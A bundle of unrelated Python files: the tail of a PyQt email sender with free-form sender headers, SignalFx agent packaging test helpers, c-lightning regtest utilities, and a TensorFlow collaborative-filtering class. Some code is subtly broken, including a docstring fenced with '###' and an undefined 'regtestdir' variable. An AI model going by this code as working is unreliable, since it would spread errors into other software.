msg['Return-path'] = str(self.ui.form_returnpath.text())
""" reply-to """
if len(str(self.ui.form_replyto.text()).strip()) != 0:
msg['Reply-to'] = str(self.ui.form_replyto.text())
""" x-header """
if len(str(self.ui.form_xheader.toPlainText()).strip()) != 0:
x_header_line = str(self.ui.form_xheader.toPlainText()).split('\n')
for x_header in x_header_line:
msg[x_header.split(':')[0]] = x_header.split(':')[1]
""" smtp server """
try:
s = smtplib.SMTP(str(self.ui.form_mailserver.text()))
except socket.error as e:
print "could not connect: %s" % str(e)
return 0
except smtplib.SMTPConnectError, e:
print "Failure to send email: %s" % str(e)
return 0
""" ehlo """
s.ehlo(str(self.ui.form_ehlo.text()))
#s.starttls()
""" sendmail """
try:
ret = s.sendmail(ENVFrom, recipients, msg.as_string())
s.quit()
# Catch all for SMTP exceptions
except smtplib.SMTPException, e:
print "Failure to send email: %s" % str(e)
end = time.time()
print "successed (%d) " % (end-start)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
w = form()
sys.exit(app.exec_())
|
common.py
|
import os
import re
import subprocess
import threading
import time
from contextlib import contextmanager
from pathlib import Path
import docker
import requests
from tests.helpers import fake_backend
from tests.helpers.util import (
get_docker_client,
get_host_ip,
pull_from_reader_in_background,
retry,
retry_on_ebadf,
run_container,
)
from tests.paths import REPO_ROOT_DIR
PACKAGING_DIR = REPO_ROOT_DIR / "packaging"
DEPLOYMENTS_DIR = REPO_ROOT_DIR / "deployments"
INSTALLER_PATH = DEPLOYMENTS_DIR / "installer/install.sh"
RPM_OUTPUT_DIR = PACKAGING_DIR / "rpm/output/x86_64"
DEB_OUTPUT_DIR = PACKAGING_DIR / "deb/output"
DOCKERFILES_DIR = Path(__file__).parent.joinpath("images").resolve()
WIN_AGENT_LATEST_URL = "https://dl.signalfx.com/windows/{stage}/zip/latest/latest.txt"
WIN_AGENT_PATH = r"C:\Program Files\SignalFx\SignalFxAgent\bin\signalfx-agent.exe"
WIN_REPO_ROOT_DIR = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", ".."))
WIN_INSTALLER_PATH = os.path.join(WIN_REPO_ROOT_DIR, "deployments", "installer", "install.ps1")
WIN_UNINSTALLER_PATH = os.path.join(WIN_REPO_ROOT_DIR, "scripts", "windows", "uninstall-agent.ps1")
INIT_SYSV = "sysv"
INIT_UPSTART = "upstart"
INIT_SYSTEMD = "systemd"
AGENT_YAML_PATH = "/etc/signalfx/agent.yaml"
PIDFILE_PATH = "/var/run/signalfx-agent.pid"
BASIC_CONFIG = """
monitors:
- type: collectd/signalfx-metadata
- type: collectd/cpu
- type: collectd/uptime
"""
def build_base_image(name, path=DOCKERFILES_DIR, dockerfile=None, buildargs=None):
client = get_docker_client()
dockerfile = dockerfile or Path(path) / f"Dockerfile.{name}"
image, _ = client.images.build(
path=str(path), dockerfile=str(dockerfile), pull=True, rm=True, forcerm=True, buildargs=buildargs
)
return image.id
LOG_COMMAND = {
INIT_SYSV: "cat /var/log/signalfx-agent.log",
INIT_UPSTART: "cat /var/log/signalfx-agent.log",
INIT_SYSTEMD: "journalctl -u signalfx-agent",
}
def get_agent_logs(container, init_system):
try:
_, output = container.exec_run(LOG_COMMAND[init_system])
except docker.errors.APIError as e:
print("Error getting agent logs: %s" % e)
return ""
return output
def get_deb_package_to_test():
return get_package_to_test(DEB_OUTPUT_DIR, "deb")
def get_rpm_package_to_test():
return get_package_to_test(RPM_OUTPUT_DIR, "rpm")
def get_package_to_test(output_dir, extension):
pkgs = list(Path(output_dir).glob(f"*.{extension}"))
if not pkgs:
raise AssertionError(f"No .{extension} files found in {output_dir}")
if len(pkgs) > 1:
raise AssertionError(f"More than one .{extension} file found in {output_dir}")
return pkgs[0]
# Run an HTTPS proxy inside the container with socat so that our fake backend
# doesn't have to worry about HTTPS. The cert file must be trusted by the
# container running the agent.
# This is pretty hacky but docker makes it hard to communicate from a container
# back to the host machine (and we don't want to use the host network stack in
# the container due to init systems). The idea is to bind mount a shared
# folder from the test host to the container that two socat instances use to
# communicate using a file to make the bytes flow between the HTTPS proxy and
# the fake backend.
@contextmanager
def socat_https_proxy(container, target_host, target_port, source_host, bind_addr):
cert = "/%s.cert" % source_host
key = "/%s.key" % source_host
socat_bin = DOCKERFILES_DIR / "socat"
stopped = False
socket_path = "/tmp/scratch/%s-%s" % (source_host, container.id[:12])
# Keep the socat instance in the container running across container
# restarts
def keep_running_in_container(cont, sock):
while not stopped:
try:
cont.exec_run(
[
"socat",
"-v",
"OPENSSL-LISTEN:443,cert=%s,key=%s,verify=0,bind=%s,fork" % (cert, key, bind_addr),
"UNIX-CONNECT:%s" % sock,
]
)
except docker.errors.APIError:
print("socat died, restarting...")
time.sleep(0.1)
threading.Thread(target=keep_running_in_container, args=(container, socket_path)).start()
proc = retry_on_ebadf(
lambda: subprocess.Popen(
[socat_bin, "-v", "UNIX-LISTEN:%s,fork" % socket_path, "TCP4:%s:%d" % (target_host, target_port)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=False,
)
)()
get_local_out = pull_from_reader_in_background(proc.stdout)
try:
yield
finally:
stopped = True
# The socat instance in the container will die with the container
proc.kill()
print(get_local_out())
@contextmanager
def run_init_system_image(
base_image,
with_socat=True,
path=DOCKERFILES_DIR,
dockerfile=None,
ingest_host="ingest.us0.signalfx.com", # Whatever value is used here needs a self-signed cert in ./images/certs/
api_host="api.us0.signalfx.com", # Whatever value is used here needs a self-signed cert in ./images/certs/
command=None,
buildargs=None,
): # pylint: disable=too-many-arguments
image_id = retry(lambda: build_base_image(base_image, path, dockerfile, buildargs), docker.errors.BuildError)
print("Image ID: %s" % image_id)
if with_socat:
backend_ip = "127.0.0.1"
else:
backend_ip = get_host_ip()
with fake_backend.start(ip_addr=backend_ip) as backend:
container_options = {
# Init systems running in the container want permissions
"privileged": True,
"volumes": {
"/sys/fs/cgroup": {"bind": "/sys/fs/cgroup", "mode": "ro"},
"/tmp/scratch": {"bind": "/tmp/scratch", "mode": "rw"},
},
"extra_hosts": {
# Socat will be running on localhost to forward requests to
# these hosts to the fake backend
ingest_host: backend.ingest_host,
api_host: backend.api_host,
},
}
if command:
container_options["command"] = command
with run_container(image_id, wait_for_ip=True, **container_options) as cont:
# Workaround for https://bugzilla.redhat.com/show_bug.cgi?id=1769831 which
# causes yum/dnf to exit with error code 141 when importing GPG keys.
cont.exec_run("mkdir -p /run/user/0")
if with_socat:
# Proxy the backend calls through a fake HTTPS endpoint so that we
# don't have to change the default configuration default by the
# package. The base_image used should trust the self-signed certs
# default in the images dir so that the agent doesn't throw TLS
# verification errors.
with socat_https_proxy(
cont, backend.ingest_host, backend.ingest_port, ingest_host, "127.0.0.1"
), socat_https_proxy(cont, backend.api_host, backend.api_port, api_host, "127.0.0.2"):
yield [cont, backend]
else:
yield [cont, backend]
@retry_on_ebadf
def is_agent_running_as_non_root(container):
code, output = container.exec_run("pgrep -u signalfx-agent signalfx-agent")
print("pgrep check: %s" % output)
return code == 0
@retry_on_ebadf
def get_agent_version(cont):
code, output = cont.exec_run("signalfx-agent -version")
output = output.decode("utf-8").strip()
assert code == 0, "command 'signalfx-agent -version' failed:\n%s" % output
match = re.match("^.+?: (.+)?,", output)
assert match and match.group(1).strip(), "failed to parse agent version from command output:\n%s" % output
return match.group(1).strip()
def run_win_command(cmd, returncodes=None, shell=True, **kwargs):
if returncodes is None:
returncodes = [0]
print('running "%s" ...' % cmd)
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=shell, close_fds=False, **kwargs)
output = proc.stdout.decode("utf-8")
if returncodes:
assert proc.returncode in returncodes, output
print(output)
return proc
def get_win_agent_version(agent_path=WIN_AGENT_PATH):
proc = run_win_command([agent_path, "-version"])
output = proc.stdout.decode("utf-8")
match = re.match("^.+?: (.+)?,", output)
assert match and match.group(1).strip(), "failed to parse agent version from command output:\n%s" % output
return match.group(1).strip()
def running_in_azure_pipelines():
return os.environ.get("AZURE_HTTP_USER_AGENT") is not None
def has_choco():
return run_win_command("choco --version", []).returncode == 0
def uninstall_win_agent():
run_win_command(f'powershell.exe "{WIN_UNINSTALLER_PATH}"')
def get_latest_win_agent_version(stage="final"):
return requests.get(WIN_AGENT_LATEST_URL.format(stage=stage)).text.strip()
|
utils.py
|
import binascii
import logging
import os
import re
import sqlite3
import subprocess
import threading
import time
from bitcoin.rpc import RawProxy as BitcoinProxy
BITCOIND_CONFIG = {
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"rpcport": 57776,
}
LIGHTNINGD_CONFIG = {
"bitcoind-poll": "1s",
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"locktime-blocks": 5,
}
DEVELOPER = os.getenv("DEVELOPER", "0") == "1"
def write_config(filename, opts):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.cmd_line = None
self.env = os.environ
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
with self.logs_cond:
self.logs.append(str(line.rstrip()))
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=60):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=60):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
f = lambda *args: proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/root/.chips", rpcport=57776):
TailableProc.__init__(self, bitcoin_dir)
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'chipsd'
self.cmd_line = [
'chipsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-regtest',
'-logtimestamps',
'-nolisten',
]
BITCOIND_CONFIG['rpcport'] = rpcport
btc_conf_file = os.path.join(regtestdir, 'chips.conf')
write_config(os.path.join(bitcoin_dir, 'chips.conf'), BITCOIND_CONFIG)
write_config(btc_conf_file, BITCOIND_CONFIG)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=60)
logging.info("BitcoinD started")
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
# lightning-1 => 0266e4598d1d3c415f572a8488830b60f7e744ed9235eb0b1ba93283b315c03518 aka JUNIORBEAM #0266e4
# lightning-2 => 022d223620a359a47ff7f7ac447c85c46c923da53389221a0054c11c1e3ca31d59 aka SILENTARTIST #022d22
# lightning-3 => 035d2b1192dfba134e10e540875d366ebc8bc353d5aa766b80c090b39c3a5d885d aka HOPPINGFIRE #035d2b
# lightning-4 => 0382ce59ebf18be7d84677c2e35f23294b9992ceca95491fcf8a56c6cb2d9de199 aka JUNIORFELONY #0382ce
# lightning-5 => 032cf15d1ad9c4a08d26eab1918f732d8ef8fdc6abb9640bf3db174372c491304e aka SOMBERFIRE #032cf1
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoin_dir, port=9735, random_hsm=False):
TailableProc.__init__(self, lightning_dir)
self.lightning_dir = lightning_dir
self.port = port
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
self.cmd_line = [
'lightningd/lightningd',
'--bitcoin-datadir={}'.format(bitcoin_dir),
'--lightning-dir={}'.format(lightning_dir),
'--port={}'.format(port),
'--allow-deprecated-apis=false',
'--override-fee-rates=15000/7500/1000',
'--network=regtest',
'--ignore-fee-limits=false'
]
if DEVELOPER:
self.cmd_line += ['--dev-broadcast-interval=1000']
if not random_hsm:
self.cmd_line += ['--dev-hsm-seed={}'.format(binascii.hexlify(seed).decode('ascii'))]
self.cmd_line += ["--{}={}".format(k, v) for k, v in sorted(LIGHTNINGD_CONFIG.items())]
self.prefix = 'lightningd(%d)' % (port)
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
def start(self):
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
# Use batch if you're doing more than one async.
def connect(self, remote_node, capacity, async=False):
# Collect necessary information
addr = self.rpc.newaddr()['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, capacity)
tx = self.bitcoin.rpc.gettransaction(txid)
start_size = self.bitcoin.rpc.getmempoolinfo()['size']
def call_connect():
try:
self.rpc.connect('127.0.0.1', remote_node.daemon.port, tx['hex'], async=False)
except Exception:
pass
t = threading.Thread(target=call_connect)
t.daemon = True
t.start()
def wait_connected():
# Up to 10 seconds to get tx into mempool.
start_time = time.time()
while self.bitcoin.rpc.getmempoolinfo()['size'] == start_size:
if time.time() > start_time + 10:
raise TimeoutError('No new transactions in mempool')
time.sleep(0.1)
self.bitcoin.generate_block(1)
# fut.result(timeout=5)
# Now wait for confirmation
self.daemon.wait_for_log(" to CHANNELD_NORMAL|STATE_NORMAL")
remote_node.daemon.wait_for_log(" to CHANNELD_NORMAL|STATE_NORMAL")
if async:
return self.executor.submit(wait_connected)
else:
return wait_connected()
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit"):
addr, wallettxid = self.fundwallet(capacity, addrtype)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
self.daemon.wait_for_log('sendrawtx exit 0, gave')
self.bitcoin.generate_block(6)
self.daemon.wait_for_log('to CHANNELD_NORMAL|STATE_NORMAL')
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**6)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
from shutil import copyfile
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
copyfile(orig, copy)
db = sqlite3.connect(copy)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.daemon.start()
|
iterativeCF.py
|
import numpy as np
import pandas as pd
import tensorflow as tf
import time, sys, datetime, copy, math, os
from threading import Thread
from multiprocessing import Process
import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '3'
log = logging.getLogger('root')
class cf_similarity(object):
def __init__(self, mat1, mat2, sim_col: str, ftr_col='FTR', val_col='RATE', log_level=logging.WARN):
###
1) input matrix 1 : contains users(items) to find similar users(items)
2) input matrix 2 : contains users(items) to be similar users(items) in matrix 1
3) sim_col : column name of users/items in matrix1 and 2
4) ftr_col : column name of items/users in matrix1 and 2
5) val_col : column name of value for ftr_col (ex. View or usage or buy count)
* Items are usually goods / videos / coupon, etc. Users are a users to use items.
ex) mat1 x mat2 = sim_mat
[sim_col x ftr_col] x [ftr_col x sim_col] = [sim_col x sim_col]
* columns names should exist on both matrices in the same manner.
usage1) In the case of user based similarity,
items are used as a feature set to calculate similarity for each users.
[sim_col, ftr_col, val_col] = ['CLNN', 'FTR', 'RATE']
usage2) In the case of item based similarity,
users are used as a feature set to calculate similarity for each items(stores/videos).
[sim_col, ftr_col, val_col] = ['ITEM', 'FTR', 'RATE']
default) Item based similarity: column names are supposed to be 'CLNN', 'FTR', 'RATE'
If it's a case of user based similarity, 'ITEM', 'FTR', 'RATE'
###
log.setLevel(log_level)
log.info('cf init data loading ...')
self.SIM_COLNAME = sim_col
start_time = time.time()
self.mat1 = mat1[[sim_col, ftr_col, val_col]]
self.mat2 = mat2[[sim_col, ftr_col, val_col]]
self.mat1.columns = ['TGT', 'FTR', 'RATE']
self.mat2.columns = ['TGT', 'FTR', 'RATE']
ftrs = pd.unique(pd.concat([self.mat1, self.mat2])['FTR'])
ftrs_map = pd.DataFrame({
'FTR': ftrs,
'FTR_IDX': range(len(ftrs))
})
mat1_targets = pd.unique(self.mat1['TGT'])
mat1_target_map = pd.DataFrame({
'TGT': mat1_targets,
'MAT1_TGT_IDX': range(len(mat1_targets))
})
mat2_targets = pd.unique(self.mat2['TGT'])
mat2_target_map = pd.DataFrame({
'TGT': mat2_targets,
'MAT2_TGT_IDX': range(len(mat2_targets))
})
self.ftrs_count = len(ftrs)
self.mat1_targets_count = len(mat1_targets)
self.mat2_targets_count = len(mat2_targets)
log.info('# of targets in 1st matrix: %d' % self.mat1_targets_count)
log.info('# of features: %d' % self.ftrs_count)
log.info('# of references in 2nd matrix: %d' % self.mat2_targets_count)
log.info('indexing 1st matrix ...')
self.mat1 = pd.merge(self.mat1, mat1_target_map, how='left')
self.mat1 = pd.merge(self.mat1, ftrs_map)
self.mat1 = self.mat1[['MAT1_TGT_IDX', 'TGT', 'FTR_IDX', 'RATE']]
self.mat1 = self.mat1.sort_values(by=['MAT1_TGT_IDX', 'FTR_IDX'])
log.info('indexing 2nd matrix ...')
self.mat2 = pd.merge(self.mat2, mat2_target_map, how='left')
self.mat2 = pd.merge(self.mat2, ftrs_map)
self.mat2 = self.mat2[['MAT2_TGT_IDX', 'TGT', 'FTR_IDX', 'RATE']]
self.mat2 = self.mat2.sort_values(by=['MAT2_TGT_IDX', 'FTR_IDX'])
log.info('normalizing 1st matrix ...')
# L2-Normalize
distances = self.mat1.assign(DISTANCE=self.mat1['RATE'] ** 2).groupby('TGT')['DISTANCE'].sum().transform(
math.sqrt)
distances = distances.to_frame().reset_index(level=0)
self.mat1 = pd.merge(self.mat1, distances, how='left')
self.mat1 = self.mat1.assign(NORMED_RATE=self.mat1['RATE'] / self.mat1['DISTANCE'])
log.info('normalizing 2nd matrix ...')
distances = self.mat2.assign(DISTANCE=self.mat2['RATE'] ** 2).groupby('TGT')['DISTANCE'].sum().transform(
math.sqrt)
distances = distances.to_frame().reset_index(level=0)
self.mat2 = pd.merge(self.mat2, distances, how='left')
self.mat2 = self.mat2.assign(NORMED_RATE=self.mat2['RATE'] / self.mat2['DISTANCE'])
log.info('building indices ...')
self.target_map1 = mat1_target_map.set_index('MAT1_TGT_IDX')['TGT'].to_dict()
self.target_map2 = mat2_target_map.set_index('MAT2_TGT_IDX')['TGT'].to_dict()
log.info('setup time elapsed : %.2f secs' % (time.time() - start_time))
def calc(self, k, filename_to_save, slicing1=2000, slicing2=50000, append=False, trace=False, mode='gpu', axis=0):
calc_time = time.time()
# reset previous graph
tf.reset_default_graph()
if not append and os.path.isfile(filename_to_save):
os.remove(filename_to_save)
if not os.path.isfile(filename_to_save) and axis == 0:
with open(filename_to_save, 'a') as f:
f.write('%s,SIM_%s,SCORE' % (self.SIM_COLNAME, self.SIM_COLNAME))
if mode == 'cpu':
os.environ["CUDA_VISIBLE_DEVICES"] = ""
session_conf = tf.ConfigProto(
intra_op_parallelism_threads=28,
inter_op_parallelism_threads=28)
elif mode == 'gpu1':
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
session_conf = tf.ConfigProto()
else:
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
session_conf = tf.ConfigProto()
RANK_TO_SAVE = k
SLICE1_SIZE = slicing1
SLICE2_SIZE = slicing2
FEATURE_SIZE = self.ftrs_count
FIRST_ITERATION_COUNT = math.ceil(self.mat1_targets_count / SLICE1_SIZE)
SECOND_ITERATION_COUNT = math.ceil(self.mat2_targets_count / SLICE2_SIZE)
log.info('# of iteration in 1st matrix : %d' % FIRST_ITERATION_COUNT)
log.info('# of iteration in 2nd matrix : %d' % SECOND_ITERATION_COUNT)
self.mat1['MAT1_SLICE_IDX'] = self.mat1['MAT1_TGT_IDX'].map(lambda x: x % SLICE1_SIZE)
self.mat2['MAT2_SLICE_IDX'] = self.mat2['MAT2_TGT_IDX'].map(lambda x: x % SLICE2_SIZE)
self.mat1['MAT1_ITERATION'] = self.mat1['MAT1_TGT_IDX'].map(lambda x: x // SLICE1_SIZE)
self.mat2['MAT2_ITERATION'] = self.mat2['MAT2_TGT_IDX'].map(lambda x: x // SLICE2_SIZE)
MAT1_SHAPE = (SLICE1_SIZE, FEATURE_SIZE)
MAT2_SHAPE = (SLICE2_SIZE, FEATURE_SIZE)
writing_thread = None
for idx1 in range(FIRST_ITERATION_COUNT):
start1 = time.time()
START_TARGET_IDX1 = idx1 * SLICE1_SIZE
mat1_sample = self.mat1[self.mat1['MAT1_ITERATION'] == idx1]
np_mat1_indices = np.array(mat1_sample[['MAT1_SLICE_IDX', 'FTR_IDX']], dtype=np.int64)
np_mat1_values = np.array(mat1_sample['NORMED_RATE'], dtype=np.float64)
log.info('STAGE %d mat1 %s prepared' % (idx1 + 1, str(MAT1_SHAPE)))
### tf setup
sess = tf.Session(config=session_conf)
tf_top_k = tf.placeholder(tf.int32, name="tf_top_k")
tf_base_idx = tf.placeholder(tf.int32, name="tf_base_idx")
with tf.variable_scope("mat1", reuse=tf.AUTO_REUSE):
tf_mat1_dense_shape = tf.placeholder(tf.int64, [2])
tf_mat1_indices = tf.placeholder(tf.int64, [None, None])
tf_mat1_values = tf.placeholder(tf.float64, [None])
tf_mat1_sparse = tf.sparse.SparseTensor(indices=tf_mat1_indices, values=tf_mat1_values,
dense_shape=tf_mat1_dense_shape)
tf_mat1 = tf.get_variable("tf_mat1", shape=MAT1_SHAPE, dtype=tf.float64)
assign_op = tf_mat1.assign(tf.sparse.to_dense(tf_mat1_sparse, default_value=0))
with tf.variable_scope("mat2"):
tf_mat2_dense_shape = tf.placeholder(tf.int64, [2])
tf_mat2_indices = tf.placeholder(tf.int64, [None, None])
tf_mat2_values = tf.placeholder(tf.float64, [None])
tf_mat2_sparse = tf.sparse.SparseTensor(indices=tf_mat2_indices, values=tf_mat2_values,
dense_shape=tf_mat2_dense_shape)
tf_mat2 = tf.sparse.to_dense(tf_mat2_sparse, default_value=0)
with tf.variable_scope("mat3", reuse=tf.AUTO_REUSE):
tf_prev_indices = tf.get_variable("tf_prev_indices", shape=[SLICE1_SIZE, RANK_TO_SAVE], dtype=tf.int32)
tf_prev_values = tf.get_variable("tf_prev_values", shape=[SLICE1_SIZE, RANK_TO_SAVE], dtype=tf.float64)
tf_result_dense = tf.matmul(tf_mat1,
tf_mat2,
transpose_a=False,
transpose_b=True,
a_is_sparse=True,
b_is_sparse=True)
tf_loop_result = tf.nn.top_k(tf_result_dense, k=tf_top_k, sorted=True)
# add up current loop2 index
tf_mat3_indices = tf.concat([tf.add(tf_loop_result.indices, tf_base_idx), tf_prev_indices], 1)
tf_mat3_values = tf.concat([tf_loop_result.values, tf_prev_values], 1)
tf_result = tf.nn.top_k(tf_mat3_values, k=tf_top_k, sorted=True)
# tf_result_values = tf_result.values
_idx = tf_result.indices
_rows = tf.broadcast_to(tf.expand_dims(tf.range(tf.shape(tf_result.values)[0]), 1), tf.shape(_idx))
_ex_idx = tf.concat((tf.expand_dims(_rows, 2), tf.expand_dims(_idx, 2)), axis=2)
tf_result_indices = tf_prev_indices.assign(tf.gather_nd(tf_mat3_indices, _ex_idx))
tf_result_values = tf_prev_values.assign(tf_result.values)
# load mat1 (reuse in loop2)
sess.run(tf.global_variables_initializer())
sess.run(assign_op, feed_dict={
tf_mat1_indices: np_mat1_indices,
tf_mat1_values: np_mat1_values,
tf_mat1_dense_shape: MAT1_SHAPE
})
sampling_time, tf_time = 0, 0
ret_values, ret_indices = [[0.0] * RANK_TO_SAVE] * SLICE1_SIZE, [[0] * RANK_TO_SAVE] * SLICE1_SIZE
sample2_thread = None
# slice2 최초 sampling
self.sample_mat2(0)
LAST_ITERATION = SECOND_ITERATION_COUNT - 1
for idx2 in range(SECOND_ITERATION_COUNT):
# 샘플링은 별도 thread에서 처리 : GPU가 바쁠동안 병행해서 동작
sampling_start = time.time()
if sample2_thread is not None:
sample2_thread.join()
np_mat2_indices = self.next_mat2_indices
np_mat2_values = self.next_mat2_values
if idx2 < LAST_ITERATION:
sample2_thread = Thread(target=self.sample_mat2, args=(idx2 + 1,))
sample2_thread.start()
sampling_time += time.time() - sampling_start
tf_start = time.time()
START_TARGET_IDX2 = idx2 * SLICE2_SIZE
dict_to_feed = {tf_mat2_indices: np_mat2_indices,
tf_mat2_values: np_mat2_values,
tf_mat2_dense_shape: MAT2_SHAPE,
tf_base_idx: START_TARGET_IDX2,
tf_top_k: RANK_TO_SAVE if RANK_TO_SAVE < SLICE2_SIZE else SLICE2_SIZE
}
if idx2 == LAST_ITERATION:
ret_values, ret_indices = sess.run([tf_result_values, tf_result_indices],
feed_dict=dict_to_feed)
else:
sess.run([tf_result_values.op, tf_result_indices.op],
feed_dict=dict_to_feed)
tf_time += time.time() - tf_start
sess.close()
log.info('STAGE %d LOOP %d mat2 %s processed (%.2f / %.2f secs elapsed)' % (
idx1 + 1, idx2 + 1, str(MAT2_SHAPE), sampling_time, tf_time))
# cut off the dummy values in the last loop
if idx1 == (FIRST_ITERATION_COUNT - 1):
# SLICE1_SIZE = self.mat1_targets_count % SLICE1_SIZE
SLICE1_SIZE = self.mat1_targets_count % SLICE1_SIZE if self.mat1_targets_count != SLICE1_SIZE else self.mat1_targets_count
ret_values = ret_values[:SLICE1_SIZE, :]
ret_indices = ret_indices[:SLICE1_SIZE, :]
if trace:
self.ret_values, self.ret_indices = ret_values, ret_indices
print(ret_values[:3, :100])
print(ret_indices[:3, :100])
break
if writing_thread is not None:
writing_thread.join()
